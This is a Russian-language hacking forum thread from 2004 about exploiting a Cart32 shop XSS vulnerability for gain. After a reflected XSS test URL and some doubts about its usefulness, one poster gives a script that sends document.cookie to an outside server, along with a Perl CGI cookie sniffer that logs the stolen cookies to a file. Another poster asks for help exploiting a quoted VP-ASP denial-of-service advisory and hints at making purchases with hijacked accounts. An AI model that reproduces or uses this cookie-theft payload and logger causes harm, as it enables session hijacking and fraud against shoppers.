![]() |
как реальзовать данную уязвимость шопа
scripts/cart32.exe/GetLatestBuilds?cart32=<script>alert('XSS')</script> для получения полезного |
Дай полный адрес
|
PUMA, а смысл использовать xss, если это подействует только на тебя ?
|
стукните кто разбирается баг нераспространённый
не хочу чтоб в массы вышел... |
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (PUMA @ сентября 15 2004,15:46)</td></tr><tr><td id="QUOTE">scripts/cart32.exe/GetLatestBuilds?cart32=<script>alert('XSS'http://forum.antichat.ru/iB_html/non...icons/wink.gif</script>[/QUOTE]<span id='postcolor'>
По-моему от таких уязвимостей толку - ноль... Этот скрипт срабатывает только у того, кто отправил данный запрос... Какой в этом смысл ? |
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (PUMA @ сентября 16 2004,20:52)</td></tr><tr><td id="QUOTE">стукните кто разбирается баг нераспространённый
не хочу чтоб в массы вышел...[/QUOTE]<span id='postcolor'> Да))) Баг действительно нераспространенный) Скажу больше, это даже не баг фактически. Скрывай его дальше Потом продашь кому-нибудь. Ну а если по существу, можно конечно найти этому применение, только вероятность совсем невелика. Тем более, чтобы найти уязвимость, нужно хотя бы сами куки для начала посмотреть, и личный кабинет юзера, поэтому и спрашивал полный УРЛ |
ну вот можно купить чтонибудь ///
а вот ещё один ктонибудь сможет реализовать ? VP-ASP 'shoprestoreorder.asp' May Let Remote Users Keep Database Connections Open A denial of service vulnerability was reported in VP-ASP. A remote user can consume database resources on the target system. The vendor reported that a remote user can restore a previous order using 'shoprestoreorder.asp' to potentially cause a database connection to stay open. The vendor indicates that this can cause performance issues. Impact: A remote user may be able to cause database connections to stay open. Solution: The vendor has described a fix for 'shoprestoreorder.asp': |
А если по-думать головой?
<script>document.location.href='http://target.com/cgi-bin/cookie.cgi?' + document.cookie;</script> (cookie.cgi) #!/usr/bin/perl -w open COOKIES,">>../cookies.txt"; print "Content-Type: text/html\n\n"; print COOKIES "----------- new cookie -----------\n"; print COOKIES "$ENV{'QUERY_STRING'}\n"; print COOKIES "---------- end of cookie ---------\n\n"; close COOKIES; http://forum.antichat.ru/iB_html/non...cons/devil.gif |
acidhack, это примитивный вариант скрипта снифера ... Лучше использовать наш ... Да и не факт, что кукисы будут полезны ...
|
acidhack - Мне типа слово "COOKIES" напоминает кучку маленьких пирожков http://forum.antichat.ru/iB_html/non...ns/biggrin.gif
|
| Время: 02:24 |